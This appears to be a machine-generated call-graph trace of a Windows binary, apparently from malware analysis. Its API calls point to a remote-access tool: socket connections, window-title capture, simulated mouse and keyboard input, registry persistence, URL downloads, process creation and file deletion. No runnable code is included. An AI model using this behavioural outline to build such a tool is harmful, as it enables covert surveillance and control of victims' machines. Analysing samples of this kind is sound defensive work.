46109->45843 46111 402121 46110->46111 46112 402150 46111->46112 46228 402718 26 API calls _Deallocate 46111->46228 46112->45845 46114->45850 46116 404206 socket 46115->46116 46117 4041fd 46115->46117 46119 404220 46116->46119 46120 404224 CreateEventW 46116->46120 46229 404262 WSAStartup 46117->46229 46119->45852 46120->45852 46121 404202 46121->46116 46121->46119 46123 4043e1 46122->46123 46124 4042b3 46122->46124 46125 4043e7 WSAGetLastError 46123->46125 46176 404343 46123->46176 46126 4042e8 46124->46126 46124->46176 46230 404cbf 46124->46230 46127 4043f7 46125->46127 46125->46176 46258 420151 27 API calls 46126->46258 46129 4042f7 46127->46129 46130 4043fc 46127->46130 46135 401f66 28 API calls 46129->46135 46263 41bc76 30 API calls 46130->46263 46132 4042d4 46136 401f66 28 API calls 46132->46136 46134 4042f0 46134->46129 46138 404306 46134->46138 46139 404448 46135->46139 46140 4042e3 46136->46140 46137 40440b 46264 404c9e 28 API calls 46137->46264 46147 404315 46138->46147 46148 40434c 46138->46148 46142 401f66 28 API calls 46139->46142 46234 41a686 46140->46234 46145 404457 46142->46145 46144 404418 46146 401f66 28 API calls 46144->46146 46150 41a686 79 API calls 46145->46150 46151 404427 46146->46151 46149 401f66 28 API calls 46147->46149 46260 420f34 56 API calls 46148->46260 46153 404324 46149->46153 46150->46176 46154 41a686 79 API calls 46151->46154 46156 401f66 28 API calls 46153->46156 46157 40442c 46154->46157 46155 404354 46158 404389 46155->46158 46159 404359 46155->46159 46160 404333 46156->46160 46162 401eea 26 API calls 46157->46162 46262 4202ea 28 API calls 46158->46262 46163 401f66 28 API calls 46159->46163 46164 41a686 79 API calls 46160->46164 46162->46176 46165 404368 46163->46165 46166 404338 46164->46166 46169 401f66 28 API calls 46165->46169 46259 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46166->46259 46167 404391 46168 4043be CreateEventW CreateEventW 46167->46168 46171 401f66 28 API calls 46167->46171 46168->46176 46170 404377 46169->46170 46172 41a686 79 API calls 46170->46172 46174 4043a7 46171->46174 46175 40437c 46172->46175 46177 401f66 28 API calls 46174->46177 46261 420592 54 API calls 46175->46261 46176->45853 46176->45858 46179 4043b6 46177->46179 46180 41a686 79 API calls 46179->46180 46181 4043bb 46180->46181 46181->46168 46182->45862 46282 4045c6 46182->46282 46183->45847 46184->45868 46506 440c51 46185->46506 46188 401f66 28 API calls 46189 4179c8 46188->46189 46190 4027ec 46189->46190 46191 4027f8 46190->46191 46192 402e78 28 API calls 46191->46192 46193 402814 46192->46193 46193->45876 46198 40276b 46194->46198 46195 4027ad 46196 401e9b 28 API calls 46195->46196 46197 4027ab 46196->46197 46197->45880 46198->46195 46199 4027a2 46198->46199 46200 402ee5 28 API calls 46199->46200 46200->46197 46201->45881 46203 403b48 46202->46203 46209 403b7a 46203->46209 46218 402d8b 46206->46218 46208 4028dd 46208->46101 46210 403b86 46209->46210 46213 403b9e 46210->46213 46212 403b5a 46212->46101 46214 403ba8 46213->46214 46216 403bb3 46214->46216 46217 403cfd 28 API calls 46214->46217 46216->46212 46217->46216 46219 402d97 46218->46219 46222 4030f7 46219->46222 46221 402dab 46221->46208 46223 403101 46222->46223 46225 403115 46223->46225 46226 4036c2 28 API calls 46223->46226 46225->46221 46226->46225 46227->46109 46228->46112 46229->46121 46231 404ccb 46230->46231 46265 402e78 46231->46265 46233 404cee 46233->46132 46235 41a737 46234->46235 46236 41a69c GetLocalTime 46234->46236 46238 401eea 26 API calls 46235->46238 46237 404cbf 28 API calls 46236->46237 46239 41a6de 46237->46239 46240 41a73f 46238->46240 46274 405ce6 46239->46274 46242 401eea 26 API calls 46240->46242 46244 41a747 46242->46244 46243 41a6ea 46245 4027cb 28 API calls 46243->46245 46244->46126 46246 41a6f6 46245->46246 46247 405ce6 28 API calls 46246->46247 46248 41a702 46247->46248 46277 406478 76 API calls 46248->46277 46250 41a710 46251 401eea 26 API calls 46250->46251 46252 41a71c 46251->46252 46253 401eea 26 API calls 46252->46253 46254 41a725 46253->46254 46255 401eea 26 API calls 46254->46255 46256 41a72e 46255->46256 46257 401eea 26 API calls 46256->46257 46257->46235 46258->46134 46259->46176 46260->46155 46261->46166 46262->46167 46263->46137 46264->46144 46267 402e85 46265->46267 46266 402ea9 46266->46233 46267->46266 46268 402e98 46267->46268 46270 402eae 46267->46270 46272 403445 28 API calls 46268->46272 46270->46266 46273 40225b 26 API calls 46270->46273 46272->46266 46273->46266 46278 404bc4 46274->46278 46276 405cf4 46276->46243 46277->46250 46279 404bd0 46278->46279 46280 40245c 28 API calls 46279->46280 46281 404be4 46280->46281 46281->46276 46285 4045d5 46282->46285 46298 4045ec 46285->46298 46286 43a88c ___crtLCMapStringA 21 API calls 46286->46298 46288 40465b 46290 404666 46288->46290 46288->46298 46318 4047eb 98 API calls 46290->46318 46291 401eef 26 API calls 46291->46298 46293 40466d 46295 401eea 26 API calls 46293->46295 46294 401eea 26 API calls 46294->46298 46296 404676 46295->46296 46297 401eea 26 API calls 46296->46297 46299 4045d4 46297->46299 46298->46286 46298->46288 46298->46291 46298->46294 46301 401f86 46298->46301 46305 404688 46298->46305 46317 40455b 59 API calls 46298->46317 46302 401f8e 46301->46302 46303 402325 28 API calls 46302->46303 46304 401fa4 46303->46304 46304->46298 46315 4046a3 46305->46315 46306 4047d8 46307 401eea 26 API calls 46306->46307 46308 4047e1 46307->46308 46308->46288 46309 403b60 28 API calls 46309->46315 46310 401eef 26 API calls 46310->46315 46311 401eea 26 API calls 46311->46315 46312 401fbd 28 API calls 46312->46315 46313 401ebd 28 API calls 46314 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 46313->46314 46314->46315 46371 414b9b 46314->46371 46315->46306 46315->46309 46315->46310 46315->46311 46315->46312 46315->46313 46319 418754 46315->46319 46317->46298 46318->46293 46320 41876a 46319->46320 46351 403b60 46320->46351 46323 418816 46324 418876 46323->46324 46332 41881b 46323->46332 46325 4188da 46324->46325 46334 41887b 46324->46334 46326 41892b 46325->46326 46336 4188df 46325->46336 46327 418930 mouse_event 46326->46327 46343 418782 46326->46343 46330 4188d4 46327->46330 46329 4187bb 46354 418abe 9 API calls 46329->46354 46333 401eea 26 API calls 46330->46333 46331 417a88 95 API calls 46331->46330 46355 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46332->46355 46335 4189a0 46333->46335 46357 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46334->46357 46337 401eea 26 API calls 46335->46337 46359 4185d7 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics MulDiv 46336->46359 46341 4189a8 46337->46341 46341->46315 46342 418810 46342->46330 46343->46330 46343->46331 46344 41891b 46360 418a72 SendInput ___scrt_fastfail 46344->46360 46346 418864 46356 4189b0 SendInput ___scrt_fastfail 46346->46356 46348 4188c4 46358 418a11 SendInput ___scrt_fastfail 46348->46358 46361 403c30 46351->46361 46354->46342 46355->46346 46356->46342 46357->46348 46358->46330 46359->46344 46360->46342 46362 403c39 46361->46362 46365 403c59 46362->46365 46366 403c68 46365->46366 46367 4032a4 28 API calls 46366->46367 46368 403c74 46367->46368 46369 402325 28 API calls 46368->46369 46370 403b73 46369->46370 46370->46323 46370->46329 46370->46343 46372 401fbd 28 API calls 46371->46372 46373 414bbd SetEvent 46372->46373 46374 414bd2 46373->46374 46375 403b60 28 API calls 46374->46375 46376 414bec 46375->46376 46377 401fbd 28 API calls 46376->46377 46378 414bfc 46377->46378 46379 401fbd 28 API calls 46378->46379 46380 414c0e 46379->46380 46450 41afc3 46380->46450 46383 401d8c 26 API calls 46386 4161fb 46383->46386 46384 414d99 46447 414dad 46384->46447 46449 414d8a 46384->46449 46385 414c37 GetTickCount 46387 41ad46 28 API calls 46385->46387 46388 401eea 26 API calls 46386->46388 46389 414c4d 46387->46389 46391 416207 46388->46391 46471 41aca0 46389->46471 46393 401eea 26 API calls 46391->46393 46395 416213 46393->46395 46394 414c54 46396 41ad46 28 API calls 46394->46396 46397 414c5f 46396->46397 46473 41ac52 46397->46473 46402 401d64 28 API calls 46403 414c89 46402->46403 46404 4027ec 28 API calls 46403->46404 46405 414c97 46404->46405 46406 40275c 28 API calls 46405->46406 46407 414ca6 46406->46407 46408 4027cb 28 API calls 46407->46408 46409 414cb5 46408->46409 46410 40275c 28 API calls 46409->46410 46411 414cc4 46410->46411 46412 4027cb 28 API calls 46411->46412 46413 414cd0 46412->46413 46414 40275c 28 API calls 46413->46414 46415 414cda 46414->46415 46416 404468 60 API calls 46415->46416 46417 414ce9 46416->46417 46418 401eea 26 API calls 46417->46418 46419 414cf2 46418->46419 46420 401eea 26 API calls 46419->46420 46421 414cfe 46420->46421 46422 401eea 26 API calls 46421->46422 46423 414d0a 46422->46423 46424 401eea 26 API calls 46423->46424 46425 414d16 46424->46425 46426 401eea 26 API calls 46425->46426 46427 414d22 46426->46427 46428 401eea 26 API calls 46427->46428 46429 414d2e 46428->46429 46430 401e13 26 API calls 46429->46430 46431 414d3a 46430->46431 46432 401eea 26 API calls 46431->46432 46433 414d43 46432->46433 46434 401eea 26 API calls 46433->46434 46435 414d4c 46434->46435 46436 401d64 28 API calls 46435->46436 46437 414d57 46436->46437 46438 43a5e7 42 API calls 46437->46438 46439 414d64 46438->46439 46440 414d69 46439->46440 46441 414d8f 46439->46441 46443 414d82 46440->46443 46444 414d77 46440->46444 46442 401d64 28 API calls 46441->46442 46442->46384 46483 404915 46443->46483 46482 4049ba 81 API calls 46444->46482 46498 404ab1 83 API calls 46447->46498 46448 414d7d 46448->46449 46449->46383 46470 41afd6 46450->46470 46451 41b046 46452 401eea 26 API calls 46451->46452 46453 41b078 46452->46453 46455 401eea 26 API calls 46453->46455 46454 41b048 46458 403b60 28 API calls 46454->46458 46457 41b080 46455->46457 46456 403b60 28 API calls 46456->46470 46460 401eea 26 API calls 46457->46460 46459 41b054 46458->46459 46461 401eef 26 API calls 46459->46461 46463 414c17 46460->46463 46464 41b05d 46461->46464 46462 401eef 26 API calls 46462->46470 46463->46384 46463->46385 46463->46449 46465 401eea 26 API calls 46464->46465 46467 41b065 46465->46467 46466 401eea 26 API calls 46466->46470 46500 41bfa9 28 API calls 46467->46500 46470->46451 46470->46454 46470->46456 46470->46462 46470->46466 46499 41bfa9 28 API calls 46470->46499 46472 41acb6 GetTickCount 46471->46472 46472->46394 46474 436050 ___scrt_fastfail 46473->46474 46475 41ac71 GetForegroundWindow GetWindowTextW 46474->46475 46476 403b40 28 API calls 46475->46476 46477 414c6d 46476->46477 46478 41aec8 46477->46478 46479 41aed5 46478->46479 46480 401f86 28 API calls 46479->46480 46481 414c7b 46480->46481 46481->46402 46482->46448 46484 40492a 46483->46484 46485 4049b1 46483->46485 46486 404933 46484->46486 46487 404987 CreateEventA CreateThread 46484->46487 46488 404942 GetLocalTime 46484->46488 46485->46449 46486->46487 46487->46485 46502 404b1d 46487->46502 46489 41ad46 28 API calls 46488->46489 46490 40495b 46489->46490 46501 404c9e 28 API calls 46490->46501 46492 404968 46493 401f66 28 API calls 46492->46493 46494 404977 46493->46494 46495 41a686 79 API calls 46494->46495 46496 40497c 46495->46496 46497 401eea 26 API calls 46496->46497 46497->46487 46498->46448 46499->46470 46500->46451 46501->46492 46505 404b29 101 API calls 46502->46505 46504 404b26 46505->46504 46507 440c5d 46506->46507 46510 440a4d 46507->46510 46511 440a64 46510->46511 46514 41ad67 46511->46514 46516 445354 20 API calls __dosmaperr 46511->46516 46513 440a9b 46517 43a827 26 API calls _Deallocate 46513->46517 46514->46188 46516->46513 46517->46514 46521 402bee 46518->46521 46520 40263b 46520->45897 46522 402bfb 46521->46522 46523 402c08 error_info_injector 46521->46523 46525 4015d8 26 API calls _Deallocate 46522->46525 46523->46520 46525->46523 46526->45902 46527->45904 46528 43a998 46530 43a9a4 _swprintf CallCatchBlock 46528->46530 46529 43a9b2 46546 445354 20 API calls __dosmaperr 46529->46546 46530->46529 46533 43a9dc 46530->46533 46532 43a9b7 46547 43a827 26 API calls _Deallocate 46532->46547 46541 444acc EnterCriticalSection 46533->46541 46536 43a9e7 46542 43aa88 46536->46542 46539 43a9c2 __wsopen_s 46541->46536 46543 43aa96 46542->46543 46545 43a9f2 46543->46545 46549 448416 39 API calls 2 library calls 46543->46549 46548 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46545->46548 46546->46532 46547->46539 46548->46539 46549->46543 46550 414dba 46565 41a51b 46550->46565 46552 414dc3 46553 401fbd 28 API calls 46552->46553 46554 414dd2 46553->46554 46555 404468 60 API calls 46554->46555 46556 414dde 46555->46556 46557 4161f2 46556->46557 46558 401eea 26 API calls 46556->46558 46559 401d8c 26 API calls 46557->46559 46558->46557 46560 4161fb 46559->46560 46561 401eea 26 API calls 46560->46561 46562 416207 46561->46562 46563 401eea 26 API calls 46562->46563 46564 416213 46563->46564 46566 41a529 46565->46566 46567 43a88c ___crtLCMapStringA 21 API calls 46566->46567 46568 41a533 InternetOpenW InternetOpenUrlW 46567->46568 46569 41a55c InternetReadFile 46568->46569 46573 41a57f 46569->46573 46570 41a5ac InternetCloseHandle InternetCloseHandle 46572 41a5be 46570->46572 46571 401f86 28 API calls 46571->46573 46572->46552 46573->46569 46573->46570 46573->46571 46574 401eea 26 API calls 46573->46574 46574->46573 46575 402bcc 46576 402bd7 46575->46576 46577 402bdf 46575->46577 46583 403315 46576->46583 46578 402beb 46577->46578 46592 4015d3 46577->46592 46584 4015d3 22 API calls 46583->46584 46585 40332a 46584->46585 46586 402bdd 46585->46586 46587 40333b 46585->46587 46602 43a7ac 26 API calls 3 library calls 46587->46602 46589 43a846 46603 43a854 11 API calls _Atexit 46589->46603 46591 43a853 46594 43360d 46592->46594 46593 43a88c ___crtLCMapStringA 21 API calls 46593->46594 46594->46593 46595 402be9 46594->46595 46597 43362e std::_Facet_Register 46594->46597 46604 442200 7 API calls 2 library calls 46594->46604 46598 433dec std::_Facet_Register 46597->46598 46605 437bd7 RaiseException 46597->46605 46606 437bd7 RaiseException 46598->46606 46601 433e09 46602->46589 46603->46591 46604->46594 46605->46598 46606->46601 46607 415cbc 46608 401d64 28 API calls 46607->46608 46609 415cc7 46608->46609 46610 401d64 28 API calls 46609->46610 46611 415ce0 46610->46611 46612 401fbd 28 API calls 46611->46612 46613 415ceb 46612->46613 46622 416436 46613->46622 46616 401d8c 26 API calls 46617 4161fb 46616->46617 46618 401eea 26 API calls 46617->46618 46619 416207 46618->46619 46620 401eea 26 API calls 46619->46620 46621 416213 46620->46621 46623 41644c 46622->46623 46624 4165ee 46622->46624 46656 4040bb 46623->46656 46626 401eea 26 API calls 46624->46626 46628 415cfe 46626->46628 46628->46616 46629 40428c 96 API calls 46630 416468 46629->46630 46631 4165e0 46630->46631 46633 41aec8 28 API calls 46630->46633 46664 4048a6 98 API calls 46631->46664 46634 416482 46633->46634 46635 4027ec 28 API calls 46634->46635 46636 416493 46635->46636 46637 40275c 28 API calls 46636->46637 46638 41649d 46637->46638 46639 404468 60 API calls 46638->46639 46640 4164ae 46639->46640 46641 401eea 26 API calls 46640->46641 46642 4164b6 46641->46642 46643 401eea 26 API calls 46642->46643 46652 4164be 46643->46652 46646 401f86 28 API calls 46646->46652 46647 41ac52 30 API calls 46647->46652 46648 41aec8 28 API calls 46648->46652 46649 40275c 28 API calls 46649->46652 46650 404468 60 API calls 46650->46652 46651 401eea 26 API calls 46651->46652 46652->46646 46652->46647 46652->46648 46652->46649 46652->46650 46652->46651 46653 401e13 26 API calls 46652->46653 46654 4165d5 46652->46654 46660 41a90c GlobalMemoryStatusEx 46652->46660 46661 41a98a GetSystemTimes Sleep GetSystemTimes 46652->46661 46653->46652 46663 4047eb 98 API calls 46654->46663 46657 4040cb 46656->46657 46658 4040fa 46657->46658 46659 4041f1 3 API calls 46657->46659 46658->46629 46659->46658 46660->46652 46662 41a9cf __aulldiv 46661->46662 46662->46652 46663->46631 46665 4339be 46666 4339ca CallCatchBlock 46665->46666 46697 4336b3 46666->46697 46668 4339d1 46669 433b24 46668->46669 46672 4339fb 46668->46672 46997 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46669->46997 46671 433b2b 46998 4426be 28 API calls _Atexit 46671->46998 46683 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46672->46683 46991 4434d1 5 API calls ___crtLCMapStringA 46672->46991 46674 433b31 46999 442670 28 API calls _Atexit 46674->46999 46677 433a14 46679 433a1a 46677->46679 46992 443475 5 API calls ___crtLCMapStringA 46677->46992 46678 433b39 46681 433a9b 46708 433c5e 46681->46708 46683->46681 46993 43edf4 38 API calls 4 library calls 46683->46993 46691 433abd 46691->46671 46692 433ac1 46691->46692 46693 433aca 46692->46693 46995 442661 28 API calls _Atexit 46692->46995 46996 433842 13 API calls 2 library calls 46693->46996 46696 433ad2 46696->46679 46698 4336bc 46697->46698 47000 433e0a IsProcessorFeaturePresent 46698->47000 46700 4336c8 47001 4379ee 10 API calls 3 library calls 46700->47001 46702 4336cd 46707 4336d1 46702->46707 47002 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46702->47002 46704 4336da 46705 4336e8 46704->46705 47003 437a17 8 API calls 3 library calls 46704->47003 46705->46668 46707->46668 46709 436050 ___scrt_fastfail 46708->46709 46710 433c71 GetStartupInfoW 46709->46710 46711 433aa1 46710->46711 46712 443422 46711->46712 47004 44ddc9 46712->47004 46714 44342b 46715 433aaa 46714->46715 47008 44e0d3 38 API calls 46714->47008 46717 40d767 46715->46717 47010 41bce3 LoadLibraryA GetProcAddress 46717->47010 46719 40d783 GetModuleFileNameW 47015 40e168 46719->47015 46721 40d79f 46722 401fbd 28 API calls 46721->46722 46723 40d7ae 46722->46723 46724 401fbd 28 API calls 46723->46724 46725 40d7bd 46724->46725 46726 41afc3 28 API calls 46725->46726 46727 40d7c6 46726->46727 47030 40e8bd 46727->47030 46729 40d7cf 46730 401d8c 26 API calls 46729->46730 46731 40d7d8 46730->46731 46732 40d835 46731->46732 46733 40d7eb 46731->46733 46734 401d64 28 API calls 46732->46734 47221 40e986 90 API calls 46733->47221 46736 40d845 46734->46736 46739 401d64 28 API calls 46736->46739 46737 40d7fd 46738 401d64 28 API calls 46737->46738 46742 40d809 46738->46742 46740 40d864 46739->46740 46741 404cbf 28 API calls 46740->46741 46743 40d873 46741->46743 47222 40e937 68 API calls 46742->47222 46745 405ce6 28 API calls 46743->46745 46747 40d87f 46745->46747 46746 40d824 47223 40e155 68 API calls 46746->47223 46749 401eef 26 API calls 46747->46749 46750 40d88b 46749->46750 46751 401eea 26 API calls 46750->46751 46752 40d894 46751->46752 46754 401eea 26 API calls 46752->46754 46753 401eea 26 API calls 46755 40dc9f 46753->46755 46756 40d89d 46754->46756 46994 433c94 GetModuleHandleW 46755->46994 46757 401d64 28 API calls 46756->46757 46758 40d8a6 46757->46758 46759 401ebd 28 API calls 46758->46759 46760 40d8b1 46759->46760 46761 401d64 28 API calls 46760->46761 46762 40d8ca 46761->46762 46763 401d64 28 API calls 46762->46763 46765 40d8e5 46763->46765 46764 40d946 46767 401d64 28 API calls 46764->46767 46782 40e134 46764->46782 46765->46764 47224 4085b4 46765->47224 46772 40d95d 46767->46772 46768 40d912 46769 401eef 26 API calls 46768->46769 46770 40d91e 46769->46770 46773 401eea 26 API calls 46770->46773 46771 40d9a4 47034 40bed7 46771->47034 46772->46771 46778 4124b7 3 API calls 46772->46778 46774 40d927 46773->46774 47228 4124b7 RegOpenKeyExA 46774->47228 46776 40d9aa 46777 40d82d 46776->46777 47037 41a463 46776->47037 46777->46753 46783 40d988 46778->46783 46781 40d9c5 46784 40da18 46781->46784 47054 40697b 46781->47054 47306 412902 30 API calls 46782->47306 46783->46771 47231 412902 30 API calls 46783->47231 46786 401d64 28 API calls 46784->46786 46789 40da21 46786->46789 46798 40da32 46789->46798 46799 40da2d 46789->46799 46791 40e14a 47307 4112b5 64 API calls ___scrt_fastfail 46791->47307 46793 40d9e4 47232 40699d 30 API calls 46793->47232 46794 40d9ee 46796 401d64 28 API calls 46794->46796 46806 40d9f7 46796->46806 46803 401d64 28 API calls 46798->46803 47235 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46799->47235 46800 40d9e9 47233 4064d0 97 API calls 46800->47233 46804 40da3b 46803->46804 47058 41ae08 46804->47058 46806->46784 46809 40da13 46806->46809 46807 40da46 46808 401e18 26 API calls 46807->46808 46810 40da51 46808->46810 47234 4064d0 97 API calls 46809->47234 46812 401e13 26 API calls 46810->46812 46813 40da5a 46812->46813 46814 401d64 28 API calls 46813->46814 46815 40da63 46814->46815 46816 401d64 28 API calls 46815->46816 46817 40da7d 46816->46817 46818 401d64 28 API calls 46817->46818 46819 40da97 46818->46819 46820 401d64 28 API calls 46819->46820 46822 40dab0 46820->46822 46821 40db1d 46823 40db2c 46821->46823 46830 40dcaa ___scrt_fastfail 46821->46830 46822->46821 46824 401d64 28 API calls 46822->46824 46825 40db35 46823->46825 46853 40dbb1 ___scrt_fastfail 46823->46853 46828 40dac5 _wcslen 46824->46828 46826 401d64 28 API calls 46825->46826 46827 40db3e 46826->46827 46829 401d64 28 API calls 46827->46829 46828->46821 46831 401d64 28 API calls 46828->46831 46832 40db50 46829->46832 47295 41265d RegOpenKeyExA 46830->47295 46833 40dae0 46831->46833 46835 401d64 28 API calls 46832->46835 46836 401d64 28 API calls 46833->46836 46837 40db62 46835->46837 46838 40daf5 46836->46838 46840 401d64 28 API calls 46837->46840 47236 40c89e 46838->47236 46839 40dcef 46841 401d64 28 API calls 46839->46841 46842 40db8b 46840->46842 46843 40dd16 46841->46843 46847 401d64 28 API calls 46842->46847 46848 401f66 28 API calls 46843->46848 46846 401e18 26 API calls 46849 40db14 46846->46849 46850 40db9c 46847->46850 46851 40dd25 46848->46851 46852 401e13 26 API calls 46849->46852 47293 40bc67 45 API calls _wcslen 46850->47293 47072 4126d2 RegCreateKeyA 46851->47072 46852->46821 47062 4128a2 46853->47062 46857 40dc45 ctype 46862 401d64 28 API calls 46857->46862 46858 40dbac 46858->46853 46860 401d64 28 API calls 46861 40dd47 46860->46861 46864 43a5e7 42 API calls 46861->46864 46863 40dc5c 46862->46863 46863->46839 46867 40dc70 46863->46867 46865 40dd54 46864->46865 46866 40dd5e 46865->46866 46870 40dd81 46865->46870 47298 41beb0 86 API calls ___scrt_fastfail 46866->47298 46868 401d64 28 API calls 46867->46868 46871 40dc7e 46868->46871 46873 401f66 28 API calls 46870->46873 46874 41ae08 28 API calls 46871->46874 46872 40dd65 CreateThread 46872->46870 47641 41c96f 10 API calls 46872->47641 46875 40dd96 46873->46875 46876 40dc87 46874->46876 46877 401f66 28 API calls 46875->46877 47294 40e219 109 API calls 46876->47294 46880 40dda5 46877->46880 46879 40dc8c 46879->46839 46882 40dc93 46879->46882 46881 41a686 79 API calls 46880->46881 46883 40ddaa 46881->46883 46882->46777 46884 401d64 28 API calls 46883->46884 46885 40ddb6 46884->46885 46886 401d64 28 API calls 46885->46886 46887 40ddcb 46886->46887 46888 401d64 28 API calls 46887->46888 46889 40ddeb 46888->46889 46890 43a5e7 42 API calls 46889->46890 46891 40ddf8 46890->46891 46892 401d64 28 API calls 46891->46892 46893 40de03 46892->46893 46894 401d64 28 API calls 46893->46894 46895 40de14 46894->46895 46896 401d64 28 API calls 46895->46896 46897 40de29 46896->46897 46898 401d64 28 API calls 46897->46898 46899 40de3a 46898->46899 46900 40de41 StrToIntA 46899->46900 47078 409517 46900->47078 46903 401d64 28 API calls 46904 40de5c 46903->46904 46905 40dea1 46904->46905 46906 40de68 46904->46906 46909 401d64 28 API calls 46905->46909 47299 43360d 22 API calls 3 library calls 46906->47299 46908 40de71 46911 401d64 28 API calls 46908->46911 46910 40deb1 46909->46910 46913 40def9 46910->46913 46914 40debd 46910->46914 46912 40de84 46911->46912 46915 40de8b CreateThread 46912->46915 46917 401d64 28 API calls 46913->46917 47300 43360d 22 API calls 3 library calls 46914->47300 46915->46905 47639 419128 102 API calls __EH_prolog 46915->47639 46919 40df02 46917->46919 46918 40dec6 46920 401d64 28 API calls 46918->46920 46922 40df6c 46919->46922 46923 40df0e 46919->46923 46921 40ded8 46920->46921 46925 40dedf CreateThread 46921->46925 46926 401d64 28 API calls 46922->46926 46924 401d64 28 API calls 46923->46924 46928 40df1e 46924->46928 46925->46913 47644 419128 102 API calls __EH_prolog 46925->47644 46927 40df75 46926->46927 46929 40df81 46927->46929 46930 40dfba 46927->46930 46931 401d64 28 API calls 46928->46931 46933 401d64 28 API calls 46929->46933 47103 41a7a2 GetComputerNameExW GetUserNameW 46930->47103 46934 40df33 46931->46934 46936 40df8a 46933->46936 47301 40c854 31 API calls 46934->47301 46941 401d64 28 API calls 46936->46941 46937 401e18 26 API calls 46938 40dfce 46937->46938 46940 401e13 26 API calls 46938->46940 46943 40dfd7 46940->46943 46944 40df9f 46941->46944 46942 40df46 46945 401e18 26 API calls 46942->46945 46946 40dfe0 SetProcessDEPPolicy 46943->46946 46947 40dfe3 CreateThread 46943->46947 46954 43a5e7 42 API calls 46944->46954 46948 40df52 46945->46948 46946->46947 46949 40e004 46947->46949 46950 40dff8 CreateThread 46947->46950 47612 40e54f 46947->47612 46951 401e13 26 API calls 46948->46951 46952 40e019 46949->46952 46953 40e00d CreateThread 46949->46953 46950->46949 47640 410f36 137 API calls 46950->47640 46955 40df5b CreateThread 46951->46955 46957 40e073 46952->46957 46959 401f66 28 API calls 46952->46959 46953->46952 47642 411524 38 API calls ___scrt_fastfail 46953->47642 46956 40dfac 46954->46956 46955->46922 47643 40196b 49 API calls 46955->47643 47302 40b95c 7 API calls 46956->47302 47114 41246e RegOpenKeyExA 46957->47114 46960 40e046 46959->46960 47303 404c9e 28 API calls 46960->47303 46963 40e053 46965 401f66 28 API calls 46963->46965 46967 40e062 46965->46967 46966 40e12a 47125 40cbac 46966->47125 46971 41a686 79 API calls 46967->46971 46969 41ae08 28 API calls 46970 40e0a4 46969->46970 47117 412584 RegOpenKeyExW 46970->47117 46973 40e067 46971->46973 46975 401eea 26 API calls 46973->46975 46975->46957 46978 401e13 26 API calls 46981 40e0c5 46978->46981 46979 40e0ed DeleteFileW 46980 40e0f4 46979->46980 46979->46981 46983 41ae08 28 API calls 46980->46983 46981->46979 46981->46980 46982 40e0db Sleep 46981->46982 47304 401e07 46982->47304 46985 40e104 46983->46985 47122 41297a RegOpenKeyExW 46985->47122 46988 401e13 26 API calls 46989 40e121 46988->46989 46990 401e13 26 API calls 46989->46990 46990->46966 46991->46677 46992->46683 46993->46681 46994->46691 46995->46693 46996->46696 46997->46671 46998->46674 46999->46678 47000->46700 47001->46702 47002->46704 47003->46707 47005 44dddb 47004->47005 47006 44ddd2 47004->47006 47005->46714 47009 44dcc8 51 API calls 4 library calls 47006->47009 47008->46714 47009->47005 47011 41bd22 LoadLibraryA GetProcAddress 47010->47011 47012 41bd12 GetModuleHandleA GetProcAddress 47010->47012 47013 41bd4b 32 API calls 47011->47013 47014 41bd3b LoadLibraryA GetProcAddress 47011->47014 47012->47011 47013->46719 47014->47013 47308 41a63f FindResourceA 47015->47308 47018 43a88c ___crtLCMapStringA 21 API calls 47019 40e192 _Yarn 47018->47019 47020 401f86 28 API calls 47019->47020 47021 40e1ad 47020->47021 47022 401eef 26 API calls 47021->47022 47023 40e1b8 47022->47023 47024 401eea 26 API calls 47023->47024 47025 40e1c1 47024->47025 47026 43a88c ___crtLCMapStringA 21 API calls 47025->47026 47027 40e1d2 _Yarn 47026->47027 47311 406052 47027->47311 47029 40e205 47029->46721 47031 40e8ca 47030->47031 47033 40e8da 47031->47033 47314 40200a 26 API calls 47031->47314 47033->46729 47315 401e8f 47034->47315 47036 40bee1 CreateMutexA GetLastError 47036->46776 47317 41b15b 47037->47317 47042 401eef 26 API calls 47043 41a49f 47042->47043 47044 401eea 26 API calls 47043->47044 47045 41a4a7 47044->47045 47046 41a4fa 47045->47046 47047 412513 31 API calls 47045->47047 47046->46781 47048 41a4cd 47047->47048 47049 41a4d8 StrToIntA 47048->47049 47050 41a4ef 47049->47050 47051 41a4e6 47049->47051 47053 401eea 26 API calls 47050->47053 47325 41c102 28 API calls 47051->47325 47053->47046 47055 40698f 47054->47055 47056 4124b7 3 API calls 47055->47056 47057 406996 47056->47057 47057->46793 47057->46794 47059 41ae1c 47058->47059 47326 40b027 47059->47326 47061 41ae24 47061->46807 47063 4128c0 47062->47063 47064 406052 28 API calls 47063->47064 47065 4128d5 47064->47065 47066 401fbd 28 API calls 47065->47066 47067 4128e5 47066->47067 47068 4126d2 29 API calls 47067->47068 47069 4128ef 47068->47069 47070 401eea 26 API calls 47069->47070 47071 4128fc 47070->47071 47071->46857 47073 412722 47072->47073 47076 4126eb 47072->47076 47074 401eea 26 API calls 47073->47074 47075 40dd3b 47074->47075 47075->46860 47077 4126fd RegSetValueExA RegCloseKey 47076->47077 47077->47073 47079 409536 _wcslen 47078->47079 47080 409541 47079->47080 47081 409558 47079->47081 47083 40c89e 31 API calls 47080->47083 47082 40c89e 31 API calls 47081->47082 47084 409560 47082->47084 47085 409549 47083->47085 47087 401e18 26 API calls 47084->47087 47086 401e18 26 API calls 47085->47086 47102 409553 47086->47102 47088 40956e 47087->47088 47089 401e13 26 API calls 47088->47089 47091 409576 47089->47091 47090 401e13 26 API calls 47092 4095ad 47090->47092 47350 40856b 28 API calls 47091->47350 47335 409837 47092->47335 47095 409588 47097 4028cf 28 API calls 47095->47097 47098 409593 47097->47098 47099 401e18 26 API calls 47098->47099 47100 40959d 47099->47100 47101 401e13 26 API calls 47100->47101 47101->47102 